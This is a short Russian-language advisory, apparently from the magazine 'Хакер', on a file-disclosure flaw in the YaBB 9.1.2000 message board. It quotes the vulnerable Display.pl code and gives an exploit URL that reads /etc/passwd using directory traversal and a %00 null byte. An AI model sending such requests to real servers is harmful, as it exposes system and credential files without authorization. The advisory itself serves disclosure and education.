Продукты «Хакера»

  • Ежеквартальный «Хакер» #3

    Ежеквартальный «Хакер» #3

    Лучшие статьи квартала на бумаге

    2 000 ₽

    Заказать журнал
  • Годовая подписка на Xakep.ru

    Годовая подписка на Xakep.ru

    Полный доступ к статьям и архиву выпусков

    6 000 ₽ в год

    Подписаться
  • «Пентест WEB» для начинающих

    «Пентест WEB» для начинающих

    Совместный курс «Хакера» и лаборатории «Хаксет»

    7 000 ₽

    Купить курс
  • Спецвыпуск «Хакера» #4

    Спецвыпуск «Хакера» #4

    Лучшие статьи за 2021–2022 годы на бумаге

    2 000 ₽

    Заказать журнал

YaBB - инструмент для создания досок объявлений. Прореха в безопасности позволяет хакеру получить доступ к любому файлу, отправляя специальный HTTP запрос.

Системы уязвимы:
YaBB 9.1.2000

Когда YaBB.pl вызывается с переменной $display и $num (это переменная, которая обрабатывает файл), доступ к файлу предоставляется безо всякой проверки безопасности. Несмотря на то, что скрипт, ответственный за обработку файлов, добавляет txt расширение к запрашиваемому файлу, хакер может получить доступ к любому файлу добавляя %00 в конец запроса. Источник проблемы - скрипт Display.pl:

sub Display {
$viewnum = $INFO{'num'};
open(FILE, "$vardir/membergroups.txt");
&lock(FILE);
@membergroups = ;
&unlock(FILE);
close(FILE);
open(FILE, "$datadir/$viewnum.txt") || &fatal_error("$txt{'23'}

Эксплоит:

Это дает доступ к файлу с паролями (число '..' может быть другим)

http://www.example.com/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии